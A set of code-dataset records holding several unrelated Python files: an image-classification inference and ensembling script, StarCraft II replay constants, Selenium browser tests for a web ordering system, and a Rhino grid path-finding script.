os.path.exists(out_name):\n continue\n probs = {}\n headers = ['id', 'probs']\n rows = []\n if 'crop_merge' in file:\n data = pd.read_csv(file)\n for index, row in data.iterrows():\n sys.stdout.write('\\r%d:%d-%d' % (ind, len(file_list), index))\n img = row.id\n values = eval(row.probs)\n if img not in probs:\n probs[img] = {\n key: [value]\n for key, value in values.items()\n }\n else:\n for key, value in values.items():\n if key not in probs[img]:\n probs[img][key] = [value]\n else:\n probs[img][key].append(value)\n\n for img, values in probs.items():\n for key, value in values.items():\n probs[img][key] = sum(value) / len(value)\n probs[img] = sorted(probs[img].items(),\n key=lambda a: a[1],\n reverse=True)[:10]\n rows.append((img, {k: round(v, 8) for k, v in probs[img]}))\n with open(out_name, 'w', encoding='utf-8', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(headers)\n writer.writerows(rows)\n\n\ndef merge_models_results(file_list):\n headers = ['id', 'predicted']\n rows = []\n probs = collections.OrderedDict()\n for ind, file in enumerate(file_list):\n if 'vit' in file:\n rate = 1\n else:\n rate = 1\n\n if \"submission_\" in file:\n data = pd.read_csv(file)\n for index, row in data.iterrows():\n sys.stdout.write('\\r%d:%d-%d' % (ind, len(file_list), index))\n img = row.id\n if img not in probs:\n probs[img] = {\n row.predict_1: [row.confid_1 * rate],\n row.predict_2: [row.confid_2 * rate],\n row.predict_3: [row.confid_3 * rate]\n }\n\n else:\n for key, value in [(row.predict_1, row.confid_1),\n (row.predict_2, row.confid_2),\n (row.predict_3, row.confid_3)]:\n if key not in probs[img]:\n probs[img][key] = [value * rate]\n else:\n probs[img][key].append(value * rate)\n\n elif \"swin_\" in file:\n data = pd.read_csv(file)\n for index, row in data.iterrows():\n sys.stdout.write('\\r%d:%d-%d' % (ind, len(file_list), index))\n img = row.id\n if img not in probs:\n probs[img] = {\n row.top1_cls: [row.top1_prob * rate],\n row.top2_cls: [row.top2_prob * rate],\n row.top3_cls: [row.top3_prob * rate],\n row.top4_cls: [row.top4_prob * rate],\n row.top5_cls: [row.top5_prob * rate]\n }\n\n else:\n for key, value in [(row.top1_cls, row.top1_prob),\n (row.top2_cls, row.top2_prob),\n (row.top3_cls, row.top3_prob),\n (row.top4_cls, row.top4_prob),\n (row.top5_cls, row.top5_prob)]:\n\n if key not in probs[img]:\n probs[img][key] = [value * rate]\n else:\n probs[img][key].append(value * rate)\n else:\n data = pd.read_csv(file)\n for index, row in data.iterrows():\n sys.stdout.write('\\r%d:%d-%d' % (ind, len(file_list), index))\n img = row.id\n values = eval(row.probs)\n if img not in probs:\n probs[img] = {\n key: [value * rate]\n for key, value in values.items()\n }\n else:\n for key, value in values.items():\n if key not in probs[img]:\n probs[img][key] = [value * rate]\n else:\n probs[img][key].append(value * rate)\n for img, values in probs.items():\n for key, value in values.items():\n probs[img][key] = sum(value) #/ len(value)\n probs[img] = sorted(probs[img].items(), key=lambda a: a[1])[-1][0]\n rows.append((img, probs[img]))\n with open('output/final.csv', 'w', encoding='utf-8', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(headers)\n writer.writerows(rows)\n\n\ndef get_emb_avg_result(name, sub_cat, embed, dis='euclidean'):\n distance = []\n embeds = []\n for cat in sub_cat:\n class_dir = os.path.join('output/val', str(cat).zfill(5))\n class_embeds = np.array([\n np.load(os.path.join(class_dir, file))\n for file in os.listdir(class_dir)\n ])\n embeds.append(class_embeds.mean(axis=0))\n\n distance = paired_distances(np.array([embed] * len(sub_cat)),\n np.array(embeds),\n metric=dis)\n label = sub_cat[distance.argmin()]\n return label\n\n\ndef get_test_labeled_data(\n csv_file, test_dir='/data3/zengpeng/products/food/classify/Test_new'):\n data = pd.read_csv(csv_file)\n for index, row in data.iterrows():\n img = row.id\n label = row.predicted\n dst_dir = os.path.join(os.path.dirname(test_dir), 'Test', str(label))\n if not os.path.exists(dst_dir):\n os.makedirs(dst_dir)\n shutil.copy(os.path.join(test_dir, img), dst_dir)\n\n\ndef get_clean_label_by_mul_model(file_list,\n source_dir='/data/zengpeng/products',\n image_save=''):\n rows = []\n probs = collections.OrderedDict()\n number = len(file_list)\n for ind, file in enumerate(file_list):\n data = pd.read_csv(file)\n for index, row in data.iterrows():\n sys.stdout.write('\\r%d:%d' % (ind, index))\n img = row.id\n label = row.predicted\n if img not in probs:\n probs[img] = [label]\n else:\n probs[img].append(label)\n ret = []\n for img, labels in probs.items():\n image_id = os.path.basename(img)\n class_id = img.split('/')[1]\n if len(set(labels)) == 1 and class_id == str(labels[0]):\n ret.append({\"class_id\": str(labels[0]), \"image_id\": image_id})\n if image_save:\n save_dir = os.path.join(image_save, class_id)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n shutil.copy(os.path.join(source_dir, img), save_dir)\n ret = json.dumps({'images': ret}, indent=4)\n with open('output/train_clean_v1.json', 'w', encoding='utf-8') as f:\n f.write(ret)\n\n\nif __name__ == '__main__':\n get_test_data = False\n merge_result = True\n ten_crop = True\n if get_test_data:\n csv_file = 'output/final.csv'\n get_test_labeled_data(csv_file)\n exit(0)\n if merge_result:\n file_list = [\n os.path.join('./output', file) for file in os.listdir('./output')\n if file.endswith('merge.csv')\n ]\n merge_crop_files(file_list)\n file_list = set([file.replace('crop_', '') for file in file_list])\n merge_models_results(file_list)\n exit(0)\n args = parse_args()\n use_gpu = True if torch.cuda.is_available() else False\n print(args)\n Config = LoadConfig(args, args.version)\n transformers = load_data_transformers(args.resize_resolution,\n args.crop_resolution, args.swap_num)\n data_set = dataset(Config,\n anno=Config.test_anno,\n swap=transformers[\"None\"],\n totensor=transformers['test_totensor']\n if ten_crop else transformers['val_totensor'],\n test=True)\n\n #for data in data_set:\n # print(data)\n\n dataloader = torch.utils.data.DataLoader(data_set,\\\n batch_size=args.batch_size,\\\n shuffle=False,\\\n num_workers=args.num_workers,\\\n collate_fn=collate_fn4cvpr)\n\n setattr(dataloader, 'total_item_len', len(data_set))\n\n cudnn.benchmark = True\n\n model = MainModel(Config)\n model_dict = model.state_dict()\n if use_gpu:\n pretrained_dict = torch.load(args.resume)\n else:\n pretrained_dict = torch.load(args.resume, map_location='cpu')\n pretrained_dict = {\n k[7:]: v\n for k, v in pretrained_dict.items() if k[7:] in model_dict\n }\n print(\n f'model_dict: {len(model_dict)}, pretrained_dict: {len(pretrained_dict)}'\n )\n model_dict.update(pretrained_dict)\n model.load_state_dict(model_dict)\n if use_gpu:\n model.cuda()\n if torch.cuda.device_count() > 1:\n model = nn.DataParallel(model)\n\n headers = ['id', 'predicted']\n headers_merge = ['id', 'probs']\n rows = []\n rows_merge = []\n if not ten_crop:\n csv_name = \"output/\" + args.backbone + \"_\" + args.resume.split(\n '/')[-1][:-4] + '_' + str(args.crop_resolution) + \".csv\"\n csv_name_merge = \"output/\" + args.backbone + \"_\" + args.resume.split(\n '/')[-1][:-4] + '_' + str(args.crop_resolution) + \"_merge.csv\"\n else:\n csv_name = \"output/\" + args.backbone + \"_\" + args.resume.split(\n '/')[-1][:-4] + '_' + str(args.crop_resolution) + \"_crop.csv\"\n csv_name_merge = \"output/\" + args.backbone + \"_\" + args.resume.split(\n '/')[-1][:-4] + '_' + str(args.crop_resolution) + \"_crop_merge.csv\"\n\n model.train(False)\n softmax = nn.Softmax(dim=1)\n\n with torch.no_grad():\n count_bar = tqdm(total=dataloader.__len__())\n for batch_cnt_val, data_val in enumerate(dataloader):\n count_bar.update(1)\n inputs, img_name = data_val\n if use_gpu:\n inputs = Variable(inputs.cuda())\n else:\n inputs = Variable(inputs)\n\n if ten_crop:\n bs, ncrops, c, h, w = inputs.size()\n inputs = inputs.view(-1, c, h, w)\n img_name = [val for val in img_name for i in range(5)]\n\n outputs = model(inputs)\n if Config.use_dcl:\n outputs_pred = outputs[0] + outputs[\n 1][:, 0:Config.numcls] + outputs[1][:, Config.numcls:2 *\n Config.numcls]\n else:\n outputs_pred = outputs[0]\n\n top10_val, top10_pos = torch.topk(softmax(outputs_pred), 10)\n for sub_name, sub_cat, value, pred in zip(img_name,\n top10_pos.tolist(),\n top10_val.tolist(),\n outputs_pred):\n ####使用验证集样本embeding平均后与pred的距离判断类别\n #sub_cat_avg = get_emb_avg_result(sub_name, sub_cat, pred.cpu().numpy())\n #rows.append((os.path.basename(sub_name), sub_cat_avg))\n\n ####softmax分类\n rows.append((os.path.basename(sub_name), sub_cat[0]))\n\n rows_merge.append(\n (os.path.basename(sub_name),\n {k: round(v, 8)\n for k, v in zip(sub_cat, value)}))\n with open(csv_name, 'w', encoding='utf-8', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(headers)\n writer.writerows(rows)\n with open(csv_name_merge, 'w', encoding='utf-8',\n newline='') as f_merge:\n writer_merge = csv.writer(f_merge)\n writer_merge.writerow(headers_merge)\n writer_merge.writerows(rows_merge)\n count_bar.close()\n","sub_path":"test_cvpr.py","file_name":"test_cvpr.py","file_ext":"py","file_size_in_byte":14981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"432342858","text":"# -*- coding: utf-8 -*-\n\n# These are found in Repack-MPQ/fileset.{locale}#Mods#Core.SC2Mod#{locale}.SC2Data/LocalizedData/Editor/EditorCategoryStrings.txt\n# EDSTR_CATEGORY_Race\n# EDSTR_PLAYERPROPS_RACE\n# The ??? means that I don't know what language it is.\n# If multiple languages use the same set they should be comma separated\nLOCALIZED_RACES = {\n\n # enUS\n 'Terran': 'Terran',\n 'Protoss': 'Protoss',\n 'Zerg': 'Zerg',\n\n # ruRU\n 'Терран': 'Terran',\n 'Протосс': 'Protoss',\n 'Зерг': 'Zerg',\n\n # koKR\n '테란': 'Terran',\n '프로토스': 'Protoss',\n '저그': 'Zerg',\n\n # ??eu\n 'Terranie': 'Terran',\n 'Protosi': 'Protoss',\n 'Zergi': 'Zerg',\n\n # zhCH\n '人类': 'Terran',\n '星灵': 'Protoss',\n '异虫': 'Zerg',\n\n # zhTW\n '人類': 'Terran',\n '神族': 'Protoss',\n '蟲族': 'Zerg',\n\n # ???\n 'Terrano': 'Terran',\n\n # deDE\n 'Terraner': 'Terran',\n\n # esES - Spanish\n # esMX - Latin American\n # frFR - French - France\n # plPL - Polish Polish\n # ptBR - Brazilian Portuguese\n}\n\n#\n# Codes as found in bytestream\n#\n\nRACE_CODES = {\n 'Terr': 'Terran',\n 'Zerg': 'Zerg',\n 'Prot': 'Protoss',\n 'RAND': 'Random',\n}\nMESSAGE_CODES = {\n '0': 'All',\n '2': 'Allies',\n '128': 'Header',\n '125': 'Ping',\n}\nTEAM_COLOR_CODES = {\n 'tc01': \"Red\",\n 'tc02': \"Blue\",\n 'tc03': \"Teal\",\n 'tc04': \"Purple\",\n 'tc05': \"Yellow\",\n 'tc06': \"Orange\",\n 'tc07': \"Green\",\n 'tc08': \"Light Pink\",\n 'tc09': \"Violet\",\n 'tc10': \"Light Grey\",\n 'tc11': \"Dark Green\",\n 'tc12': \"Brown\",\n 'tc13': \"Light Green\",\n 'tc14': \"Dark Grey\",\n 'tc15': \"Pink\",\n 'tc16': \"??\",\n}\nDIFFICULTY_CODES = {\n 'VyEy': 'Very easy',\n 'Easy': 'Easy',\n 'Medi': 'Medium',\n 'Hard': 'Hard',\n 'VyHd': 'Very hard',\n 'Insa': 'Insane',\n}\nGAME_TYPE_CODES = {\n 'Priv': 'Private',\n 'Pub': 'Public',\n 'Amm': 'Ladder',\n '': 'Single',\n}\n# (name, key for team ids)\nGAME_FORMAT_CODES = {\n '1v1': '1v1',\n '2v2': '2v2',\n '3v3': '3v3',\n '4v4': '4v4',\n '5v5': '5v5',\n '6v6': '6v6',\n 'FFA': 'FFA',\n}\nGAME_SPEED_CODES = {\n 'Slor': 'Slower',\n 'Slow': 'Slow',\n 'Norm': 'Normal',\n 'Fast': 'Fast',\n 'Fasr': 'Faster',\n}\n\nGAME_SPEED_FACTOR = {\n 'Slower': 0.6,\n 'Slow': 0.8,\n 'Normal': 1.0,\n 'Fast': 1.2,\n 'Faster': 1.4\n}\n\nPLAYER_TYPE_CODES = {\n 'Humn': 'Human',\n 'Comp': 'Computer',\n 'Open': 'Open',\n 'Clsd': 'Closed',\n}\nGATEWAY_CODES = {\n 'US': 'Americas',\n 'KR': 'Asia',\n 'EU': 'Europe',\n 'SG': 'South East Asia',\n 'XX': 'Public Test',\n}\nCOLOR_CODES = {\n 'B4141E': 'Red',\n '0042FF': 'Blue',\n '1CA7EA': 'Teal',\n 'EBE129': 'Yellow',\n '540081': 'Purple',\n 'FE8A0E': 'Orange',\n '168000': 'Green',\n 'CCA6FC': 'Light pink',\n '1F01C9': 'Violet',\n '525494': 'Light grey',\n '106246': 'Dark green',\n '4E2A04': 'Brown',\n '96FF91': 'Light green',\n '232323': 'Dark grey',\n 'E55BB0': 'Pink'\n}\n\nCOLOR_CODES_INV = dict(zip(COLOR_CODES.values(),COLOR_CODES.keys()))\n\n## Names of the different properties found in the s2gs files lobby part\nLOBBY_PROPERTY_NAMES = {\n 1 : 'unknown1', #0001/0002\n 2 : 'unknown2', #0001/0002\n 500 : 'Slot type', #Clsd/Open/Humn/Comp\n 1000 : 'unknown3', #Dflt\n 1001 : 'Melee', #no/yes no->2000, yes->2001\n 2000 : 'Custom mode', #t2/t3/t4/t5/FFA/Cust (tX = X teams)\n 2001 : 'Melee mode', #1v1/2v2/3v3/4v4/5v5/6v6/FFA\n 2002 : '1v1 Team', #T1/T2\n 2003 : '2v2 Team', #T1/T2/T1/T2\n 2004 : '3v3 Team', #T1/T2/T1/T2/T1/T2\n 2005 : '4v4 Team', #T1/T2/T1/T2/T1/T2/T1/T2\n 2006 : 'FFA Team', #T1/T2/T3/T4/T5/T6\n 2007 : '5v5 Team', #T1/T2/T1/T2/T1/T2/T1/T2/T1/T2\n 2008 : '6v6 Team', #T1/T2/T1/T2/T1/T2/T1/T2/T1/T2/T1/T2\n 2011 : \"'2 Teams' team\", #(T1/T2)*6\n 2012 : \"'3 Teams' team\", #(T1/T2/T3)*6\n 2013 : \"'4 Teams' team\", #(T1/T2/T3/T4)*6\n 2014 : \"'5 Teams' team\", #(T1/T2/T3/T4/T5)*6\n 2017 : \"FFA Team\", #T1/T2/T3/T4/T5/T6\n 2018 : \"'Custom' team\", #(T1/T2/T3/T4/T5/T6)*5\n 3000 : 'Game speed', #Slor/Slow/Norm/Fast/Fasr\n 3001 : 'Race', #Terr/Zerg/Prot/RAND\n 3002 : 'Color', #tc01/tc02/tc03/tc04/.../tc15\n 3003 : 'Handicap', #50/60/70/80/90/100\n 3004 : 'Difficulty', #VyEy/Easy/Medi/Hard/VyHd/Insa\n 3006 : 'Game countdown', #3/5/7/10/15/20/25/30 (countdown timer in lobby (seconds))\n 3007 : 'Player mode', #Part/Watch (Participating/Watching) Watch->3008\n 3008 : 'Spectate mode', #Obs/Ref\n 3009 : 'Lobby type', #Priv/Pub/Amm\n 3010 : 'unknown4', #no/yes (Never required)\n}\n\nBUILD_ORDER_UPGRADES = {\n # Protoss\n\n ## Forge\n 0x2902 : 'Protoss Ground Weapons Level 1',\n 0x2a02 : 'Protoss Ground Weapons Level 2',\n 0x2b02 : 'Protoss Ground Weapons Level 3',\n 0x2c02 : 'Protoss Ground Armor Level 1',\n 0x2d02 : 'Protoss Ground Armor Level 2',\n 0x2e02 : 'Protoss Ground Armor Level 3',\n 0x2f02 : 'Protoss Shields Level 1',\n 0x3002 : 'Protoss Shields Level 2',\n 0x3102 : 'Protoss Shields Level 3',\n ## Robo bay\n 0x3202 : 'Gravitic Boosters',\n 0x3302 : 'Gravitic Drive',\n 0x3402 : 'Extended Thermal Lance',\n ## Cyber core\n 0x5002 : 'Protoss Air Weapons Level 1',\n 0x5102 : 'Protoss Air Weapons Level 2',\n 0x5202 : 'Protoss Air Weapons Level 3',\n 0x5302 : 'Protoss Air Armor Level 1',\n 0x5402 : 'Protoss Air Armor Level 2',\n 0x5502 : 'Protoss Air Armor Level 3',\n 0x5602 : 'Warp Gate Research',\n 0x5702 : 'Hallucination',\n ## Twilight\n 0x5802 : 'Charge',\n 0x5902 : 'Blink',\n ## Fleet Beacon\n 0x0302 : 'Graviton Catapult',\n 0x7102 : 'Anion Pulse-Crystals',\n\n #Zerg\n\n ## Roach Warren\n 0x0402 : 'Gial Reconstitution',\n 0x0502 : 'Tunneling Claws',\n ## Ultralisk Cavern\n 0x0602 : 'Chitinous Plating',\n ## Evo. chamber\n 0x3702 : 'Zerg Melee Attacks Level 1',\n 0x3802 : 'Zerg Melee Attacks Level 2',\n 0x3902 : 'Zerg Melee Attacks Level 3',\n 0x3a02 : 'Zerg Ground Carapace Level 1',\n 0x3b02 : 'Zerg Ground Carapace Level 2',\n 0x3c02 : 'Zerg Ground Carapace Level 3',\n 0x3d02 : 'Zerg Missile Attacks Level 1',\n 0x3e02 : 'Zerg Missile Attacks Level 2',\n 0x3f02 : 'Zerg Missile Attacks Level 3',\n ## Lair\n 0x4002 : 'Pneumatized Carapace',\n 0x4102 : 'Ventral Sacs',\n 0x4202 : 'Burrow',\n ## Pool\n 0x4302 : 'Adrenal Glands',\n 0x4402 : 'Metabolic Boost',\n ## Hydra den\n 0x4502 : 'Grooved Spines',\n ## Spire\n 0x4602 : 'Zerg Flyer Attacks Level 1',\n 0x4702 : 'Zerg Flyer Attacks Level 2',\n 0x4802 : 'Zerg Flyer Attacks Level 3',\n 0x4902 : 'Zerg Flyer Carapace Level 1',\n 0x4a02 : 'Zerg Flyer Carapace Level 2',\n 0x4b02 : 'Zerg Flyer Carapace Level 3',\n ## Infestation pit\n 0x4c02 : 'Pathogen Glands',\n 0x7202 : 'Neural Parasite',\n ## Baneling Nest\n 0x4d02 : 'Centrifugal Hooks',\n\n #Terran\n ## Engineering bay\n 0x702 : 'Hi-Sec Auto Tracking',\n 0x802 : 'Terran Building Armor',\n 0x902 : 'Terran Infantry Weapons Level 1',\n 0xa02 : 'Terran Infantry Weapons Level 2',\n 0xb02 : 'Terran Infantry Weapons Level 3',\n 0xc02 : 'Neosteel Frame',\n 0xd02 : 'Terran Infantry Armor Level 1',\n 0xe02 : 'Terran Infantry Armor Level 2',\n 0xf02 : 'Terran Infantry Armor Level 3',\n ## Barracks tech lab\n 0x1002 : 'Nitro Packs',\n 0x1102 : 'Stimpack',\n 0x1202 : 'Combat Shields',\n 0x1302 : 'Concussive Shells',\n ## Factory tech lab\n 0x1402 : 'Siege Tech',\n 0x1502 : 'Infernal Pre-igniter',\n 0x7002 : '250mm Strike Cannons',\n ## Starport tech lab\n 0x1602 : 'Cloaking Field',\n 0x1702 : 'Caduceus Reactor',\n 0x1902 : 'Seeker Missile',\n 0x1a02 : 'Durable Materials',\n 0x4e02 : 'Corvid Reactor',\n ## Fusion Core\n 0x1802 : 'Behemoth Reactor',\n 0x4f02 : 'Weapon Refit',\n ## Ghost Academy\n 0x1b02 : 'Personal Cloaking',\n 0x1c02 : 'Moebiue Reactor',\n ## Armory\n 0x1d02 : 'Terran Vehicle Plating Level 1',\n 0x1e02 : 'Terran Vehicle Plating Level 2',\n 0x1f02 : 'Terran Vehicle Plating Level 3',\n 0x2002 : 'Terran Vehicle Weapons Level 1',\n 0x2102 : 'Terran Vehicle Weapons Level 2',\n 0x2202 : 'Terran Vehicle Weapons Level 3',\n 0x2302 : 'Terran Ship Plating Level 1',\n 0x2402 : 'Terran Ship Plating Level 2',\n 0x2502 : 'Terran Ship Plating Level 3',\n 0x2602 : 'Terran Ship Weapons Level 1',\n 0x2702 : 'Terran Ship Weapons Level 2',\n 0x2802 : 'Terran Ship Weapons Level 3'\n }\n\n# TODO: Not sure if this is a complete mapping\nREGIONS = {\n # United States\n 'us': {\n 1: 'us',\n 2: 'la',\n },\n\n # Europe\n 'eu': {\n 1: 'eu',\n 2: 'ru',\n },\n\n # Korea - appear to both map to same place\n 'kr': {\n 1: 'kr',\n 2: 'tw',\n },\n # Taiwan - appear to both map to same place\n 'tw': {\n 1: 'kr',\n 2: 'tw',\n },\n\n # China - different url scheme (www.battlenet.com.cn)?\n 'cn': {\n 1: 'cn',\n },\n\n # South East Asia\n 'sea': {\n 1: 'sea',\n },\n\n # Singapore\n 'sg': {\n 1: 'sg',\n },\n\n # Public Test\n 'xx': {\n 1: 'xx',\n },\n}\n","sub_path":"sc2reader/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":9319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"634338170","text":"from selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\n\ndriver = webdriver.Chrome(executable_path=\"/Users/kztmr/Downloads/chromedriver\")\ndriver.set_window_size(500, 600)\n\ndriver.get(\"http://yvsc.jp/\")\ndriver.execute_script(\"window.scrollTo(0, 3500);\")\ntime.sleep(3)\nif EC.element_to_be_clickable('//img[@alt=\"山形銀行\"]'):\n print(\"This button is clickable.\")\n driver.find_element_by_xpath('//img[@alt=\"山形銀行\"]').click()\n","sub_path":"clickable_test.py","file_name":"clickable_test.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"603363513","text":"from selenium import webdriver\nfrom datetime import date\nimport time\n\n# Midas codes to use\ncodes = [153267,144096,153267,148165,195691,89404,590130,86443,62404,73322,220329,88892,193845,172665,171497,190359,190353,193465,210855,198089,193446,180550]\n\n# Instantiate the Python/Selenium WebDriver\nbrowser = webdriver.Ie(\"IEDriverServer.exe\")\n\n# Open the Telesales login prompt\nbrowser.get(\"http://example.com\")\ntime.sleep(5)\n\n# Login to Telesales\nbrowser.find_element_by_id(\"ctl00_MainPanelContentPlaceholder_txtUserID\").send_keys(\"fgd4tfre\")\nbrowser.find_element_by_id(\"ctl00_MainPanelContentPlaceholder_txtPassword\").send_keys(\"g44tgg\")\nbrowser.find_element_by_id(\"ctl00_MainPanelContentPlaceholder_cmdLogin\").click()\n\n# Now find and select a customer\nbrowser.get(\"https://example.com\")\nbrowser.find_element_by_id(\"ctl00_MainPanelContentPlaceholder_CustomerAccountTextbox\").send_keys(\"4621348\")\nbrowser.find_element_by_id(\"ctl00_MainPanelContentPlaceholder_SelectCustomerButton\").click()\ntime.sleep(2)\n\n# Now we can start placing an order\nbrowser.get(\"https://example.com\")\ntime.sleep(2)\n\n# Run through a loop and add a product to the basket\nx=0\nproduct_num=0\nwhile (x < 30000):\n\ttry:\n\t\t# Get the page url\n\t\ty=0\n\t\twhile (y < 10):\n\t\t\tif(browser.current_url != \"\"):\n\t\t\t\tpageURL = browser.current_url\n\t\t\t\ttime.sleep(0.25)\n\t\t\ty = y + 1\n\t\t\n\t\t# Perform adding actions and error catching\n\t\t\n\t\t# Reset product choice\n\t\tif (product_num > 14):\n\t\t\tproduct_num = 0\n\t\t\n\t\t# If the total counter is a modulus of 3 then do some page navigations\n\t\t# to mix it up a little bit. Rock'n\n\t\tif (x % 5 == 0 or x % 11 == 0):\n\t\t\tbrowser.get(\"https://example.com/\")\n\t\t\ttime.sleep(15)\n\t\t\tbrowser.get(\"https://example.com/\")\n\t\t\ttime.sleep(2)\n\t\t\n\t\t# Add a midas code to the order\n\t\tbrowser.find_element_by_id(\"MidasTextbox\").click()\n\t\ttime.sleep(2)\n\t\t\n\t\tbrowser.find_element_by_id(\"MidasTextbox\").clear()\n\t\ttime.sleep(2)\n\t\t\n\t\tbrowser.find_element_by_id(\"MidasTextbox\").send_keys(midas_codes[product_num])\n\t\ttime.sleep(2)\n\t\t\n\t\tbrowser.find_element_by_id(\"AddProductButton\").click()\n\t\ttime.sleep(2)\n\t\t\n\t\tbrowser.find_element_by_id(\"ctl00_MainPanelContentPlaceholder_UpdateSubtotalButton\").click()\n\t\ttime.sleep(2)\n\t\t\n\t\t# Increase the QTY of the product by 2\n\t\t\t# TODO\n\t\n\t# Catch errors - detect whether user has been logged out of Telesales\n\texcept Exception as inst:\n\t\ttoday = date.today()\n\t\t\n\t\t# Print header of Error Message Block in CLI\n\t\tprint ('=======================================')\n\t\t\n\t\t# Check that the user is still on the Ordering screen\n\t\tif (pageURL.lower() != \"https://example.com/\"):\n\t\t\t\n\t\t\t# Check if the user has been logged out\n\t\t\tif (pageURL.lower() == \"https://example.com/\"):\n\t\t\t\tprint ('User has been logged out!')\n\t\t\t\tprint (today)\n\t\t\t\tprint (time.strftime(\"%H:%M:%S\"))\n\t\t\t\tprint (inst)\n\t\t\t\texit()\n\t\t\t# Else: Something else is wrong with this screen. Log and exit.\n\t\t\telse:\n\t\t\t\tif (pageURL.lower() != \"https://example.com/\"):\n\t\t\t\t\tprint ('ERROR! URL has changed but not logged out!')\n\t\t\t\t\tprint (today)\n\t\t\t\t\tprint (time.strftime(\"%H:%M:%S\"))\n\t\t\t\t\tprint (inst)\n\t\t\t\t\texit()\n\t\t# Else uncaught issue. Exit\n\t\telse:\n\t\t\tprint ('Generic Error! Exited.')\n\t\t\tprint ('The URL did not chage, but there was an error while trying to perform the test routine.')\n\t\t\tprint (today)\n\t\t\tprint (time.strftime(\"%H:%M:%S\"))\n\t\t\tprint (inst)\n\t\t\n\t\t# Print footer of Error Message Block in CLI\n\t\tprint ('=======================================')\n\t\t\n\t\t\n\t# Sleep for 10 seconds\n\ttime.sleep(50)\n\t\n\t# Increment X\n\tx = x + 1\n\tproduct_num = product_num + 1\n\nexit()\n","sub_path":"app-pool-detector.py","file_name":"app-pool-detector.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"544415382","text":"import rhinoscriptsyntax as rs\nimport math\nimport random\nimport operator \nfrom operator import itemgetter\n\nclass Cell(object):\n def __init__(self,poly,id):\n self.poly_pts=poly\n self.id=id\n self.poly=None\n self.score=0\n def get_id(self):\n return self.id\n def gen_poly(self):\n self.poly=rs.AddPolyline(self.poly_pts)\n rs.ObjectLayer(self.poly,'ns_poly')\n return self.poly\n def del_poly(self):\n if(self.poly):\n rs.DeleteObject(self.poly)\n def get_cen(self):\n p0=self.poly_pts[0]\n p2=self.poly_pts[2]\n cen=[(p0[0]+p2[0])/2,(p0[1]+p2[1])/2,0]\n return cen\n def display(self):\n self.t=rs.AddTextDot(str(self.id)+\",\"+str(int(self.score)),self.get_cen())\n rs.ObjectLayer(self.t,'ns_textdot')\n def set_score(self,t):\n self.score=t\n def get_score(self):\n return self.score\n def getL(self):\n p0=self.poly_pts[0]\n p1=self.poly_pts[1]\n di=rs.Distance(p0,p1)\n return di\n def getW(self):\n p0=self.poly_pts[0]\n p3=self.poly_pts[3]\n di=rs.Distance(p0,p3)\n return di\n def pt_in_poly(self,p):\n poly=self.gen_poly()\n t=None\n if(rs.PointInPlanarClosedCurve(p,poly)==0):\n t=False\n else:\n t=True\n rs.DeleteObject(poly)\n return t\n\ndef genGrid(site_crv,l, w):\n srf=rs.AddPlanarSrf(site_crv)\n srfUdom=rs.SurfaceDomain(srf,0)\n srfVdom=rs.SurfaceDomain(srf,1)\n umin=srfUdom[0]\n umax=srfUdom[1]\n u=(umax-umin)/l\n #u=(umax-umin)/u_\n ustep=(umax-umin)/u\n vmin=srfVdom[0]\n vmax=srfVdom[1]\n v=(vmax-vmin)/w\n #v=(vmax-vmin)/v_\n vstep=(vmax-vmin)/v\n i=umin\n plane_cell_li=[]\n counter=0\n while imax_di):\n max_di=di\n max_id=id\n cells[max_id].set_score(100)\n\ndef buildPath(cells):\n path=[]\n path.append(cells[0])\n counter=0\n while(counter<25):\n counter+=1\n i=path[-1]\n me=i.get_cen()\n meL=i.getL()\n meW=i.getW()\n me_score=i.get_score()\n ri=[me[0]+meL,me[1],0] #ri\n le=[me[0]-meL,me[1],0] #le\n up=[me[0],me[1]+meW,0] #up\n dn=[me[0],me[1]-meW,0] #dn\n max_score=0\n score_li=[] # [ cell, score ]\n for j in cells:\n if(j not in path):\n this_score=j.get_score()\n if(j.pt_in_poly(le)==True):\n \n score_li.append([j,this_score])\n if(j.pt_in_poly(ri)==True):\n score_li.append([j,this_score])\n if(j.pt_in_poly(up)==True):\n score_li.append([j,this_score])\n if(j.pt_in_poly(dn)==True):\n score_li.append([j,this_score])\n score_li.sort(key=itemgetter(1))\n print('\\n\\n---------')\n if(len(score_li)>0):\n for j in score_li:\n print('got score= %s , this_id= %s, req_id= %s'%(j[1], i.id, j[0].id))\n r=random.randint(0,len(score_li)-1)\n req_cell=score_li[-1][0]\n next=req_cell.get_cen()\n print('accepted id %s'%(req_cell.id))\n L=rs.AddLine(me,next)\n rs.ObjectLayer(L,'ns_path')\n path.append(req_cell)\n\ndef update_matrix(cells,recursion_counter):\n for i in cells:\n me=i.get_cen()\n meL=i.getL()\n meW=i.getW()\n me_score=i.get_score()\n ri=[me[0]+meL,me[1],0] #ri\n le=[me[0]-meL,me[1],0] #le\n up=[me[0],me[1]+meW,0] #up\n dn=[me[0],me[1]-meW,0] #dn\n max_score=0\n score_li=[]\n for j in cells:\n this_score=j.get_score()\n this=j.get_cen()\n di=rs.Distance(this,me)\n if(j.pt_in_poly(le)==True):\n score_li.append(this_score)\n if(j.pt_in_poly(ri)==True):\n score_li.append(this_score)\n if(j.pt_in_poly(up)==True):\n score_li.append(this_score)\n if(j.pt_in_poly(dn)==True):\n score_li.append(this_score)\n r=random.randint(0,10)\n if(r>3):\n for j in score_li:\n if(j>max_score):\n max_score=j\n else:\n if(len(score_li)>1):\n r=random.randint(0,len(score_li)-1)\n max_score=score_li[r]\n else:\n max_score=j\n if(max_score>i.get_score()):\n i.set_score(max_score*0.85)\n sum=0\n for i in cells:\n me=i.get_cen()\n #rs.AddTextDot(i.get_score(),me)\n if(me==0):\n sum+=1\n if(recursion_counter<10 and sum<5):\n recursion_counter+=1\n #print('recursion')\n update_matrix(cells,recursion_counter)\n 